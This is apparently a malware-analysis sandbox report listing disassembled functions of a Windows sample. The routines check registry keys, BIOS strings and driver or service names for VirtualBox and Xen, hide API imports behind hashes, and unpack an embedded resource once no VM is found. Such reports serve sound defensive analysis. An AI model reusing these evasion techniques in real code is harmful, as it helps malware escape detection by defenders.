00412A9C mov eax, dword ptr [00411FA4h] 45524157
00412AA1 mov dword ptr [ebp-00000518h], eax
00412AA7 mov ecx, dword ptr [00411FA8h] 5043415C
00412AAD mov dword ptr [ebp-00000514h], ecx
00412AB3 mov edx, dword ptr [00411FACh] 41465C49
00412AB9 mov dword ptr [ebp-00000510h], edx
00412ABF mov ax, word ptr [00411FB0h] 5444
00412AC5 mov word ptr [ebp-0000050Ch], ax
00412ACC mov cl, byte ptr [00411FB2h] 00
00412AD2 mov byte ptr [ebp-0000050Ah], cl
00412AD8 push 00000051h
00412ADA push 00000000h
00412ADC lea edx, dword ptr [ebp-00000509h]
00412AE2 push edx
00412AE3 call 00415F8Fh
00412AE8 add esp, 0Ch
00412AEB mov eax, dword ptr [00411FB4h] ASCII "HARDWARE\ACPI\RSDT"
00412AF0 mov dword ptr [ebp-000004B8h], eax
00412AF6 mov ecx, dword ptr [00411FB8h] 45524157
00412AFC mov dword ptr [ebp-000004B4h], ecx
00412B02 mov edx, dword ptr [00411FBCh] 5043415C
00412B08 mov dword ptr [ebp-000004B0h], edx
00412B0E mov eax, dword ptr [00411FC0h] 53525C49
00412B13 mov dword ptr [ebp-000004ACh], eax
00412B19 mov cx, word ptr [00411FC4h] 5444
00412B20 mov word ptr [ebp-000004A8h], cx
00412B27 mov dl, byte ptr [00411FC6h] 00
00412B2D mov byte ptr [ebp-000004A6h], dl
00412B33 push 00000051h
00412B35 push 00000000h
00412B37 lea eax, dword ptr [ebp-000004A5h]
00412B3D push eax
00412B3E call 00415F8Fh
00412B43 add esp, 0Ch
00412B46 mov ecx, 00000007h
00412B4B mov esi, 00411FC8h ASCII "SYSTEM\ControlSet001\Services"
00412B50 lea edi, dword ptr [ebp-00000454h]
00412B56 rep movsd
00412B58 movsw
00412B5A push 00000046h
00412B5C push 00000000h
00412B5E lea ecx, dword ptr [ebp-00000436h]
00412B64 push ecx
00412B65 call 00415F8Fh
00412B6A add esp, 0Ch
00412B6D mov ecx, 00000013h
00412B72 mov esi, 00411FE8h ASCII "HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0"
00412B77 lea edi, dword ptr [ebp-000003F0h]
00412B7D rep movsd
00412B7F movsb
00412B80 xor edx, edx
00412B82 mov dword ptr [ebp-000003A3h], edx
00412B88 mov dword ptr [ebp-0000039Fh], edx
00412B8E mov dword ptr [ebp-0000039Bh], edx
00412B94 mov dword ptr [ebp-00000397h], edx
00412B9A mov dword ptr [ebp-00000393h], edx
00412BA0 mov word ptr [ebp-0000038Fh], dx
00412BA7 mov byte ptr [ebp-0000038Dh], dl
00412BAD mov ecx, 00000007h
00412BB2 mov esi, 00412038h ASCII "HARDWARE\DESCRIPTION\System"
00412BB7 lea edi, dword ptr [ebp-0000038Ch]
00412BBD rep movsd
00412BBF push 00000048h
00412BC1 push 00000000h
00412BC3 lea eax, dword ptr [ebp-00000370h]
00412BC9 push eax
00412BCA call 00415F8Fh
00412BCF add esp, 0Ch
00412BD2 mov ecx, dword ptr [00412054h] ASCII "VBOX__"
00412BD8 mov dword ptr [ebp-00000328h], ecx
00412BDE mov dx, word ptr [00412058h] 5F5F
00412BE5 mov word ptr [ebp-00000324h], dx
00412BEC mov al, byte ptr [0041205Ah] 00
00412BF1 mov byte ptr [ebp-00000322h], al
00412BF7 push 0000005Dh
00412BF9 push 00000000h
00412BFB lea ecx, dword ptr [ebp-00000321h]
00412C01 push ecx
00412C02 call 00415F8Fh
00412C07 add esp, 0Ch
00412C0A mov dl, byte ptr [00411992h] 2E
00412C10 mov byte ptr [ebp-000002C4h], dl
00412C16 push 00000063h
00412C18 push 00000000h
00412C1A lea eax, dword ptr [ebp-000002C3h]
00412C20 push eax
00412C21 call 00415F8Fh
00412C26 add esp, 0Ch
00412C29 mov cl, byte ptr [00411993h] 65
00412C2F mov byte ptr [ebp-00000260h], cl
00412C35 push 00000063h
00412C37 push 00000000h
00412C39 lea edx, dword ptr [ebp-0000025Fh]
00412C3F push edx
00412C40 call 00415F8Fh
00412C45 add esp, 0Ch
00412C48 mov al, byte ptr [00411997h] 00
00412C4D mov byte ptr [ebp-000001FCh], al
00412C53 push 00000063h
00412C55 push 00000000h
00412C57 lea ecx, dword ptr [ebp-000001FBh]
00412C5D push ecx
00412C5E call 00415F8Fh
00412C63 add esp, 0Ch
00412C66 mov edx, dword ptr [0041205Ch] ASCII "VBoxMouse"
00412C6C mov dword ptr [ebp-00000198h], edx
00412C72 mov eax, dword ptr [00412060h] 73756F4D
00412C77 mov dword ptr [ebp-00000194h], eax
00412C7D mov cx, word ptr [00412064h] 0065
00412C84 mov word ptr [ebp-00000190h], cx
00412C8B push 0000005Ah
00412C8D push 00000000h
00412C8F lea edx, dword ptr [ebp-0000018Eh]
00412C95 push edx
00412C96 call 00415F8Fh
00412C9B add esp, 0Ch
00412C9E mov eax, dword ptr [00412068h] ASCII "VBoxGuest"
00412CA3 mov dword ptr [ebp-00000134h], eax
00412CA9 mov ecx, dword ptr [0041206Ch] 73657547
00412CAF mov dword ptr [ebp-00000130h], ecx
00412CB5 mov dx, word ptr [00412070h] 0074
00412CBC mov word ptr [ebp-0000012Ch], dx
00412CC3 push 0000005Ah
00412CC5 push 00000000h
00412CC7 lea eax, dword ptr [ebp-0000012Ah]
00412CCD push eax
00412CCE call 00415F8Fh
00412CD3 add esp, 0Ch
00412CD6 mov ecx, dword ptr [00412074h] ASCII "VBoxService"
00412CDC mov dword ptr [ebp-000000D0h], ecx
00412CE2 mov edx, dword ptr [00412078h] 76726553
00412CE8 mov dword ptr [ebp-000000CCh], edx
00412CEE mov eax, dword ptr [0041207Ch] 00656369
00412CF3 mov dword ptr [ebp-000000C8h], eax
00412CF9 push 00000058h
00412CFB push 00000000h
00412CFD lea ecx, dword ptr [ebp-000000C4h]
00412D03 push ecx
00412D04 call 00415F8Fh
00412D09 add esp, 0Ch
00412D0C mov edx, dword ptr [00412080h] ASCII "VBoxSF"
00412D12 mov dword ptr [ebp-6Ch], edx
00412D15 mov ax, word ptr [00412084h] 4653
00412D1B mov word ptr [ebp-68h], ax
00412D1F mov cl, byte ptr [00412086h] 00
00412D25 mov byte ptr [ebp-66h], cl
00412D28 push 0000005Dh
00412D2A push 00000000h
00412D2C lea edx, dword ptr [ebp-65h]
00412D2F push edx
00412D30 call 00415F8Fh
00412D35 add esp, 0Ch
00412D38 mov eax, dword ptr [00412088h] ASCII "Identifier"
00412D3D mov dword ptr [ebp-00000648h], eax
00412D43 mov ecx, dword ptr [0041208Ch] 69666974
00412D49 mov dword ptr [ebp-00000644h], ecx
00412D4F mov dx, word ptr [00412090h] 7265
00412D56 mov word ptr [ebp-00000640h], dx
00412D5D mov al, byte ptr [00412092h] 00
00412D62 mov byte ptr [ebp-0000063Eh], al
00412D68 push 00000059h
00412D6A push 00000000h
00412D6C lea ecx, dword ptr [ebp-0000063Dh]
00412D72 push ecx
00412D73 call 00415F8Fh
00412D78 add esp, 0Ch
00412D7B mov edx, dword ptr [00412094h] ASCII "SystemBiosVersion"
00412D81 mov dword ptr [ebp-000005E4h], edx
00412D87 mov eax, dword ptr [00412098h] 69426D65
00412D8C mov dword ptr [ebp-000005E0h], eax
00412D92 mov ecx, dword ptr [0041209Ch] 6556736F
00412D98 mov dword ptr [ebp-000005DCh], ecx
00412D9E mov edx, dword ptr [004120A0h] 6F697372
00412DA4 mov dword ptr [ebp-000005D8h], edx
00412DAA mov ax, word ptr [004120A4h] 006E
00412DB0 mov word ptr [ebp-000005D4h], ax
00412DB7 push 00000052h
00412DB9 push 00000000h
00412DBB lea ecx, dword ptr [ebp-000005D2h]
00412DC1 push ecx
00412DC2 call 00415F8Fh
00412DC7 add esp, 0Ch
00412DCA mov edx, dword ptr [004120A8h] ASCII "VBOX"
00412DD0 mov dword ptr [ebp-00000650h], edx
00412DD6 mov al, byte ptr [004120ACh] 00
00412DDB mov byte ptr [ebp-0000064Ch], al
00412DE1 xor ecx, ecx
00412DE3 mov word ptr [ebp-04h], cx
00412DE7 jmp 00412DF5h
00412DE9 mov dx, word ptr [ebp-04h] xrefs 00412E2C
00412DED add dx, 0001h
00412DF1 mov word ptr [ebp-04h], dx
00412DF5 movzx eax, word ptr [ebp-04h] xrefs 00412DE7
00412DF9 cmp eax, 03h
00412DFC jnl 00412E2Eh
00412DFE push 00000004h
00412E00 lea ecx, dword ptr [ebp-00000328h]
00412E06 push ecx
00412E07 movzx edx, word ptr [ebp-04h]
00412E0B imul edx, edx, 64h
00412E0E lea eax, dword ptr [ebp+edx-00000580h]
00412E15 push eax
00412E16 call 00413450h
00412E1B add esp, 0Ch
00412E1E movzx ecx, al
00412E21 test ecx, ecx
00412E23 je 00412E2Ch
00412E25 mov al, 01h
00412E27 jmp 00412F26h
00412E2C jmp 00412DE9h xrefs 00412E23
00412E2E movzx edx, word ptr [ebp-04h] xrefs 00412DFC
00412E32 imul edx, edx, 64h
00412E35 lea eax, dword ptr [ebp+edx-00000580h]
00412E3C mov dword ptr [ebp-00000680h], eax
00412E42 push 00000004h
00412E44 lea ecx, dword ptr [ebp-00000198h]
00412E4A push ecx
00412E4B mov edx, dword ptr [ebp-00000680h]
00412E51 push edx
00412E52 call 00413450h
00412E57 add esp, 0Ch
00412E5A movzx eax, al
00412E5D mov cx, word ptr [ebp-04h]
00412E61 add cx, 0001h
00412E65 mov word ptr [ebp-04h], cx
00412E69 test eax, eax
00412E6B je 00412E74h
00412E6D mov al, 01h
00412E6F jmp 00412F26h
00412E74 xor edx, edx xrefs 00412E6B
00412E76 mov word ptr [ebp-00000654h], dx
00412E7D jmp 00412E91h
00412E7F mov ax, word ptr [ebp-00000654h] xrefs 00412EE1
00412E86 add ax, 0001h
00412E8A mov word ptr [ebp-00000654h], ax
00412E91 movzx ecx, word ptr [ebp-00000654h] xrefs 00412E7D
00412E98 cmp ecx, 02h
00412E9B jnl 00412EE3h
00412E9D lea edx, dword ptr [ebp-00000650h]
00412EA3 push edx
00412EA4 movzx eax, word ptr [ebp-00000654h]
00412EAB imul eax, eax, 64h
00412EAE lea ecx, dword ptr [ebp+eax-00000648h]
00412EB5 push ecx
00412EB6 movzx edx, word ptr [ebp-04h]
00412EBA movzx eax, word ptr [ebp-00000654h]
00412EC1 add edx, eax
00412EC3 imul edx, edx, 64h
00412EC6 lea ecx, dword ptr [ebp+edx-00000580h]
00412ECD push ecx
00412ECE call 00413560h
00412ED3 add esp, 0Ch
00412ED6 movzx edx, al
00412ED9 test edx, edx
00412EDB je 00412EE1h
00412EDD mov al, 01h
00412EDF jmp 00412F26h
00412EE1 jmp 00412E7Fh xrefs 00412EDB
00412EE3 xor eax, eax xrefs 00412E9B
00412EE5 mov word ptr [ebp-04h], ax
00412EE9 jmp 00412EF7h
00412EEB mov cx, word ptr [ebp-04h] xrefs 00412F22
00412EEF add cx, 0001h
00412EF3 mov word ptr [ebp-04h], cx
00412EF7 movzx edx, word ptr [ebp-04h] xrefs 00412EE9
00412EFB cmp edx, 02h
00412EFE jnl 00412F24h
00412F00 movzx eax, word ptr [ebp-04h]
00412F04 imul eax, eax, 14h
00412F07 lea ecx, dword ptr [ebp+eax-0000067Ch]
00412F0E push ecx
00412F0F call 00413380h
00412F14 add esp, 04h
00412F17 movzx edx, al
00412F1A test edx, edx
00412F1C je 00412F22h
00412F1E mov al, 01h
00412F20 jmp 00412F26h
00412F22 jmp 00412EEBh xrefs 00412F1C
00412F24 xor al, al xrefs 00412EFE
00412F26 pop edi xrefs 00412F20, 00412EDF, 00412E6F, 00412E27
00412F27 pop esi
00412F28 mov esp, ebp
00412F2A pop ebp
00412F2B ret function end
APIs
    • LoadLibraryA.KERNEL32, ref: 004158E6
  • LoadLibraryA.KERNEL32, ref: 00415DFC
Address Instruction Meta Information
00415D90 push ebp xrefs 00415E7C
00415D91 mov ebp, esp
00415D93 sub esp, 00000110h
00415D99 mov dword ptr [ebp-04h], 00000000h
00415DA0 jmp 00415DABh
00415DA2 mov eax, dword ptr [ebp-04h] xrefs 00415E35
00415DA5 add eax, 01h
00415DA8 mov dword ptr [ebp-04h], eax
00415DAB cmp dword ptr [ebp-04h], 03h xrefs 00415DA0
00415DAF jnc 00415E3Ah
00415DB5 mov ecx, dword ptr [ebp-04h]
00415DB8 imul ecx, ecx, 06h
00415DBB mov edx, dword ptr [ecx+00416388h]
00415DC1 cmp edx, dword ptr [ebp+0Ch]
00415DC4 jne 00415E35h
00415DC6 mov eax, dword ptr [ebp-04h]
00415DC9 cmp dword ptr [00418C38h+eax*4], 00000000h
00415DD1 jne 00415E1Ah
00415DD3 lea ecx, dword ptr [ebp-00000110h]
00415DD9 push ecx
00415DDA mov edx, dword ptr [ebp-04h]
00415DDD imul edx, edx, 06h
00415DE0 movzx eax, word ptr [edx+0041638Ch]
00415DE7 add eax, 0041639Ah
00415DEC push eax
00415DED call 00415D50h
00415DF2 add esp, 08h
00415DF5 lea ecx, dword ptr [ebp-00000110h]
00415DFB push ecx
00415DFC call dword ptr [00418C44h] LoadLibraryA@KERNEL32.DLL (Hidden Import)
00415E02 mov edx, dword ptr [ebp-04h]
00415E05 mov dword ptr [00418C38h+edx*4], eax
00415E0C mov eax, dword ptr [ebp-04h]
00415E0F cmp dword ptr [00418C38h+eax*4], 00000000h
00415E17 jne 00415E1Ah
00415E19 int3
00415E1A push 00000000h xrefs 00415DD1, 00415E17
00415E1C mov ecx, dword ptr [ebp+08h]
00415E1F push ecx
00415E20 mov edx, dword ptr [ebp-04h]
00415E23 mov eax, dword ptr [00418C38h+edx*4]
00415E2A push eax
00415E2B call 00415760h
00415E30 add esp, 0Ch
00415E33 jmp 00415E3Bh
00415E35 jmp 00415DA2h xrefs 00415DC4
00415E3A int3 xrefs 00415DAF
00415E3B mov esp, ebp xrefs 00415E33
00415E3D pop ebp
00415E3E ret function end
APIs
    • WriteFile.KERNEL32, ref: 004162D0
  • wvsprintfA.USER32, ref: 004160DC
Address Instruction Meta Information
004160BE push ebp xrefs 004155CA, 0041548A
004160BF mov ebp, esp
004160C1 sub esp, 00000400h
004160C7 lea eax, dword ptr [ebp+10h]
004160CA push eax
004160CB push dword ptr [ebp+0Ch]
004160CE lea eax, dword ptr [ebp-00000400h]
004160D4 push eax
004160D5 mov byte ptr [ebp-00000400h], 00000000h
004160DC call dword ptr [00401034h] wvsprintfA@USER32.DLL (Import)
004160E2 push dword ptr [ebp+08h]
004160E5 lea eax, dword ptr [ebp-00000400h]
004160EB push eax
004160EC call 004162AFh
004160F2 pop ecx Count = 2
004160F3 leave
004160F4 ret function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • Process32Next.KERNEL32, ref: 004136FA
Address Instruction Meta Information
004136E0 push ebp xrefs 004133F3
004136E1 mov ebp, esp
004136E3 mov eax, dword ptr [ebp+0Ch]
004136E6 push eax
004136E7 mov ecx, dword ptr [ebp+08h]
004136EA push ecx
004136EB push 6B5366BEh
004136F0 push C930EA1Eh
004136F5 call 00415E40h
004136FA call eax Process32Next@KERNEL32.DLL (Hidden Import)
004136FC pop ebp
004136FD retn 0008h function end
APIs
    • LoadLibraryA.KERNEL32, ref: 00415DFC
  • SwitchToThread.KERNEL32, ref: 00415E55
Address Instruction Meta Information
00415E40 push ebp xrefs 00413741, 004137A1, 0041377D, 00414AB1, 004149E9, 004141CA, 00414105, 00414A19, 004141F5, 00412265, 00412281, 004122A5, 004137F1, 00414A61, 00414A95, 00413FB9, 00414011, 00414239, 00414AD9, 00414B05, 00414B25, 00414B41, 00414B75, 0041443D, 00414465, 00414481, 0041449D, 004144E5, 00414511, 00414541, 00414565, 00414581, 00413F81, 004145A5, 004137D5, 004136B5, 004136D5, 00413711, 004136F5, 00414191, 00414281, 004156F9, 00414FFD, 00415025, 0041504D, 00415351, 0041536D, 004153A9, 00414121, 00414211, 0041414D, 00414171, 004140C1, 004141AD, 00413FE5, 0041403D, 00414075, 004140A1, 00413F65, 004140E1, 00414261
00415E41 mov ebp, esp
00415E43 push ecx
00415E44 mov eax, 00000001h xrefs 00415E5B
00415E49 mov ecx, 004164ECh
00415E4E xchg dword ptr [ecx], eax
00415E50 cmp eax, 01h
00415E53 jne 00415E5Dh
00415E55 call dword ptr [00418C48h] SwitchToThread@KERNEL32.DLL (Hidden Import)
00415E5B jmp 00415E44h
00415E5D mov edx, dword ptr [ebp+08h] xrefs 00415E53
00415E60 push edx
00415E61 mov ecx, 00416CF0h
00415E66 call 00415980h
00415E6B mov dword ptr [ebp-04h], eax
00415E6E cmp dword ptr [ebp-04h], 00000000h
00415E72 jne 00415E99h
00415E74 mov eax, dword ptr [ebp+0Ch]
00415E77 push eax
00415E78 mov ecx, dword ptr [ebp+08h]
00415E7B push ecx
00415E7C call 00415D90h
00415E81 add esp, 08h
00415E84 mov dword ptr [ebp-04h], eax
00415E87 mov edx, dword ptr [ebp-04h]
00415E8A push edx
00415E8B mov eax, dword ptr [ebp+08h]
00415E8E push eax
00415E8F mov ecx, 00416CF0h
00415E94 call 004159B0h
00415E99 xor ecx, ecx xrefs 00415E72
00415E9B mov edx, 004164ECh
00415EA0 xchg dword ptr [edx], ecx
00415EA2 mov eax, dword ptr [ebp-04h]
00415EA5 mov esp, ebp
00415EA7 pop ebp
00415EA8 retn 0008h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CloseHandle.KERNEL32, ref: 00413716
Address Instruction Meta Information
00413700 push ebp xrefs 00413442, 00414DAB, 0041532C, 004151B7, 0041517B, 00413D24, 00413D30, 00413D3C, 00413B62, 00413B6E, 00413B7A, 00413B20, 00413B2C, 00413AC2, 00413ACE, 00413A72, 00413A0B
00413701 mov ebp, esp
00413703 mov eax, dword ptr [ebp+08h]
00413706 push eax
00413707 push 6B5366BEh
0041370C push 723EB0D5h
00413711 call 00415E40h
00413716 call eax CloseHandle@KERNEL32.DLL (Import)
00413718 pop ebp
00413719 retn 0004h function end
Strings
  • xenservice.exe, va: 004120B0
  • HARDWARE\ACPI\DSDT, va: 004120C0
  • HARDWARE\ACPI\FADT, va: 004120D4
  • HARDWARE\ACPI\RSDT, va: 004120E8
  • SYSTEM\ControlSet001\Services, va: 004120FC
  • Xen, va: 0041211C
  • xenevtchn, va: 00412120
  • xennet, va: 0041212C
  • xennet6, va: 00412134
  • xensvc, va: 0041213C
  • xenvdb, va: 00412144
Address Instruction Meta Information
00412F30 push ebp xrefs 0041481E
00412F31 mov ebp, esp
00412F33 sub esp, 00000590h
00412F39 push esi
00412F3A push edi
00412F3B mov eax, dword ptr [004120B0h] ASCII "xenservice.exe"
00412F40 mov dword ptr [ebp-00000590h], eax
00412F46 mov ecx, dword ptr [004120B4h] 69767265
00412F4C mov dword ptr [ebp-0000058Ch], ecx
00412F52 mov edx, dword ptr [004120B8h] 652E6563
00412F58 mov dword ptr [ebp-00000588h], edx
00412F5E mov ax, word ptr [004120BCh] 6578
00412F64 mov word ptr [ebp-00000584h], ax
00412F6B mov cl, byte ptr [004120BEh] 00
00412F71 mov byte ptr [ebp-00000582h], cl
00412F77 lea edx, dword ptr [ebp-00000590h]
00412F7D push edx
00412F7E call 00413380h
00412F83 add esp, 04h
00412F86 movzx eax, al
00412F89 test eax, eax
00412F8B je 00412F94h
00412F8D mov al, 01h
00412F8F jmp 004132D3h
00412F94 mov ecx, dword ptr [004120C0h] ASCII "HARDWARE\ACPI\DSDT" xrefs 00412F8B
00412F9A mov dword ptr [ebp-00000580h], ecx
00412FA0 mov edx, dword ptr [004120C4h] 45524157
00412FA6 mov dword ptr [ebp-0000057Ch], edx
00412FAC mov eax, dword ptr [004120C8h] 5043415C
00412FB1 mov dword ptr [ebp-00000578h], eax
00412FB7 mov ecx, dword ptr [004120CCh] 53445C49
00412FBD mov dword ptr [ebp-00000574h], ecx
00412FC3 mov dx, word ptr [004120D0h] 5444
00412FCA mov word ptr [ebp-00000570h], dx
00412FD1 mov al, byte ptr [004120D2h] 00
00412FD6 mov byte ptr [ebp-0000056Eh], al
00412FDC push 00000051h
00412FDE push 00000000h
00412FE0 lea ecx, dword ptr [ebp-0000056Dh]
00412FE6 push ecx
00412FE7 call 00415F8Fh
00412FEC add esp, 0Ch
00412FEF mov edx, dword ptr [004120D4h] ASCII "HARDWARE\ACPI\FADT"
00412FF5 mov dword ptr [ebp-0000051Ch], edx
00412FFB mov eax, dword ptr [004120D8h] 45524157
00413000 mov dword ptr [ebp-00000518h], eax
00413006 mov ecx, dword ptr [004120DCh] 5043415C
0041300C mov dword ptr [ebp-00000514h], ecx
00413012 mov edx, dword ptr [004120E0h] 41465C49
00413018 mov dword ptr [ebp-00000510h], edx
0041301E mov ax, word ptr [004120E4h] 5444
00413024 mov word ptr [ebp-0000050Ch], ax
0041302B mov cl, byte ptr [004120E6h] 00
00413031 mov byte ptr [ebp-0000050Ah], cl
00413037 push 00000051h
00413039 push 00000000h
0041303B lea edx, dword ptr [ebp-00000509h]
00413041 push edx
00413042 call 00415F8Fh
00413047 add esp, 0Ch
0041304A mov eax, dword ptr [004120E8h] ASCII "HARDWARE\ACPI\RSDT"
0041304F mov dword ptr [ebp-000004B8h], eax
00413055 mov ecx, dword ptr [004120ECh] 45524157
0041305B mov dword ptr [ebp-000004B4h], ecx
00413061 mov edx, dword ptr [004120F0h] 5043415C
00413067 mov dword ptr [ebp-000004B0h], edx
0041306D mov eax, dword ptr [004120F4h] 53525C49
00413072 mov dword ptr [ebp-000004ACh], eax
00413078 mov cx, word ptr [004120F8h] 5444
0041307F mov word ptr [ebp-000004A8h], cx
00413086 mov dl, byte ptr [004120FAh] 00
0041308C mov byte ptr [ebp-000004A6h], dl
00413092 push 00000051h
00413094 push 00000000h
00413096 lea eax, dword ptr [ebp-000004A5h]
0041309C push eax
0041309D call 00415F8Fh
004130A2 add esp, 0Ch
004130A5 mov ecx, 00000007h
004130AA mov esi, 004120FCh ASCII "SYSTEM\ControlSet001\Services"
004130AF lea edi, dword ptr [ebp-00000454h]
004130B5 rep movsd
004130B7 movsw
004130B9 push 00000046h
004130BB push 00000000h
004130BD lea ecx, dword ptr [ebp-00000436h]
004130C3 push ecx
004130C4 call 00415F8Fh
004130C9 add esp, 0Ch
004130CC mov edx, dword ptr [0041211Ch] ASCII "Xen"
004130D2 mov dword ptr [ebp-000003F0h], edx
004130D8 push 00000060h
004130DA push 00000000h
004130DC lea eax, dword ptr [ebp-000003ECh]
004130E2 push eax
004130E3 call 00415F8Fh
004130E8 add esp, 0Ch
004130EB mov cl, byte ptr [0041199Bh] 00
004130F1 mov byte ptr [ebp-0000038Ch], cl
004130F7 push 00000063h
004130F9 push 00000000h
004130FB lea edx, dword ptr [ebp-0000038Bh]
00413101 push edx
00413102 call 00415F8Fh
00413107 add esp, 0Ch
0041310A mov al, byte ptr [0041199Fh] 00
0041310F mov byte ptr [ebp-00000328h], al
00413115 push 00000063h
00413117 push 00000000h
00413119 lea ecx, dword ptr [ebp-00000327h]
0041311F push ecx
00413120 call 00415F8Fh
00413125 add esp, 0Ch
00413128 mov dl, byte ptr [004119A3h] 00
0041312E mov byte ptr [ebp-000002C4h], dl
00413134 push 00000063h
00413136 push 00000000h
00413138 lea eax, dword ptr [ebp-000002C3h]
0041313E push eax
0041313F call 00415F8Fh
00413144 add esp, 0Ch
00413147 mov cl, byte ptr [004119A7h] 00
0041314D mov byte ptr [ebp-00000260h], cl
00413153 push 00000063h
00413155 push 00000000h
00413157 lea edx, dword ptr [ebp-0000025Fh]
0041315D push edx
0041315E call 00415F8Fh
00413163 add esp, 0Ch
00413166 mov eax, dword ptr [00412120h] ASCII "xenevtchn"
0041316B mov dword ptr [ebp-000001FCh], eax
00413171 mov ecx, dword ptr [00412124h] 68637476
00413177 mov dword ptr [ebp-000001F8h], ecx
0041317D mov dx, word ptr [00412128h] 006E
00413184 mov word ptr [ebp-000001F4h], dx
0041318B push 0000005Ah
0041318D push 00000000h
0041318F lea eax, dword ptr [ebp-000001F2h]
00413195 push eax
00413196 call 00415F8Fh
0041319B add esp, 0Ch
0041319E mov ecx, dword ptr [0041212Ch] ASCII "xennet"
004131A4 mov dword ptr [ebp-00000198h], ecx
004131AA mov dx, word ptr [00412130h] 7465
004131B1 mov word ptr [ebp-00000194h], dx
004131B8 mov al, byte ptr [00412132h] 00
004131BD mov byte ptr [ebp-00000192h], al
004131C3 push 0000005Dh
004131C5 push 00000000h
004131C7 lea ecx, dword ptr [ebp-00000191h]
004131CD push ecx
004131CE call 00415F8Fh
004131D3 add esp, 0Ch
004131D6 mov edx, dword ptr [00412134h] ASCII "xennet6"
004131DC mov dword ptr [ebp-00000134h], edx
004131E2 mov eax, dword ptr [00412138h] 00367465
004131E7 mov dword ptr [ebp-00000130h], eax
004131ED push 0000005Ch
004131EF push 00000000h
004131F1 lea ecx, dword ptr [ebp-0000012Ch]
004131F7 push ecx
004131F8 call 00415F8Fh
004131FD add esp, 0Ch
00413200 mov edx, dword ptr [0041213Ch] ASCII "xensvc"
00413206 mov dword ptr [ebp-000000D0h], edx
0041320C mov ax, word ptr [00412140h] 6376
00413212 mov word ptr [ebp-000000CCh], ax
00413219 mov cl, byte ptr [00412142h] 00
0041321F mov byte ptr [ebp-000000CAh], cl
00413225 push 0000005Dh
00413227 push 00000000h
00413229 lea edx, dword ptr [ebp-000000C9h]
0041322F push edx
00413230 call 00415F8Fh
00413235 add esp, 0Ch
00413238 mov eax, dword ptr [00412144h] ASCII "xenvdb"
0041323D mov dword ptr [ebp-6Ch], eax
00413240 mov cx, word ptr [00412148h] 6264
00413247 mov word ptr [ebp-68h], cx
0041324B mov dl, byte ptr [0041214Ah] 00
00413251 mov byte ptr [ebp-66h], dl
00413254 push 0000005Dh
00413256 push 00000000h
00413258 lea eax, dword ptr [ebp-65h]
0041325B push eax
0041325C call 00415F8Fh
00413261 add esp, 0Ch
00413264 xor ecx, ecx
00413266 mov word ptr [ebp-04h], cx
0041326A jmp 00413278h
0041326C mov dx, word ptr [ebp-04h] xrefs 004132AC
00413270 add dx, 0001h
00413274 mov word ptr [ebp-04h], dx
00413278 movzx eax, word ptr [ebp-04h] xrefs 0041326A
0041327C cmp eax, 03h
0041327F jnl 004132AEh
00413281 push 00000004h
00413283 lea ecx, dword ptr [ebp-000003F0h]
00413289 push ecx
0041328A movzx edx, word ptr [ebp-04h]
0041328E imul edx, edx, 64h
00413291 lea eax, dword ptr [ebp+edx-00000580h]
00413298 push eax
00413299 call 00413450h
0041329E add esp, 0Ch
004132A1 movzx ecx, al
004132A4 test ecx, ecx
004132A6 je 004132ACh
004132A8 mov al, 01h
004132AA jmp 004132D3h
004132AC jmp 0041326Ch xrefs 004132A6
004132AE push 00000004h xrefs 0041327F
004132B0 lea edx, dword ptr [ebp-000001FCh]
004132B6 push edx
004132B7 lea eax, dword ptr [ebp-00000454h]
004132BD push eax
004132BE call 00413450h
004132C3 add esp, 0Ch
004132C6 movzx ecx, al
004132C9 test ecx, ecx
004132CB je 004132D1h
004132CD mov al, 01h
004132CF jmp 004132D3h
004132D1 xor al, al xrefs 004132CB
004132D3 pop edi xrefs 004132CF, 004132AA, 00412F8F
004132D4 pop esi
004132D5 mov esp, ebp
004132D7 pop ebp
004132D8 ret function end
Strings
  • %APPDATA%, va: 00411C78
  • %TEMP%, va: 00411C84
  • %WINDIR%\WEB, va: 00411C8C
  • RT_RCDATA, va: 00411C9C
Address Instruction Meta Information
004147E0 push ebp xrefs 004161E4
004147E1 mov ebp, esp
004147E3 sub esp, 00000130h
004147E9 call 00415D00h
004147EE call 004122B0h
004147F3 movzx eax, al
004147F6 test eax, eax
004147F8 jne 0041482Ah
004147FA call 00412540h
004147FF movzx ecx, al
00414802 test ecx, ecx
00414804 jne 0041482Ah
00414806 call 004127E0h
0041480B movzx edx, al
0041480E test edx, edx
00414810 jne 0041482Ah
00414812 call 004129B0h
00414817 movzx eax, al
0041481A test eax, eax
0041481C jne 0041482Ah
0041481E call 00412F30h
00414823 movzx ecx, al
00414826 test ecx, ecx
00414828 je 00414831h
0041482A push 00000000h xrefs 004147F8, 00414804, 00414810, 0041481C
0041482C call 00414AA0h
00414831 push 00411C78h ASCII "%APPDATA%" xrefs 00414828
00414836 call 004145B0h
0041483B add esp, 04h
0041483E mov dword ptr [ebp-00000128h], eax
00414844 mov edx, dword ptr [ebp-00000128h]
0041484A push edx
0041484B call 00414630h
00414850 add esp, 04h
00414853 push 00411C84h ASCII "%TEMP%"
00414858 call 004145B0h
0041485D add esp, 04h
00414860 mov dword ptr [ebp-00000114h], eax
00414866 mov eax, dword ptr [ebp-00000114h]
0041486C push eax
0041486D call 00414630h
00414872 add esp, 04h
00414875 push 00411C8Ch ASCII "%WINDIR%\WEB"
0041487A call 004145B0h
0041487F add esp, 04h
00414882 mov dword ptr [ebp-00000124h], eax
00414888 mov ecx, dword ptr [ebp-00000124h]
0041488E push ecx
0041488F call 00414630h
00414894 add esp, 04h
00414897 call 00412190h
0041489C movzx edx, al
0041489F test edx, edx
004148A1 je 004148AAh
004148A3 push 00000000h
004148A5 call 00414AA0h
004148AA call 004146E0h xrefs 004148A1
004148AF push 00000104h
004148B4 lea eax, dword ptr [ebp-00000110h]
004148BA push eax
004148BB push 00000000h
004148BD call 00414220h
004148C2 push 00411C9Ch ASCII "RT_RCDATA"
004148C7 push 00000065h
004148C9 push 00000000h
004148CB call 00414AC0h
004148D0 mov dword ptr [ebp-00000120h], eax
004148D6 cmp dword ptr [ebp-00000120h], 00000000h
004148DD jne 004148E6h
004148DF xor eax, eax
004148E1 jmp 004149C4h
004148E6 mov ecx, dword ptr [ebp-00000120h] xrefs 004148DD
004148EC push ecx
004148ED push 00000000h
004148EF call 00414AF0h
004148F4 mov dword ptr [ebp-04h], eax
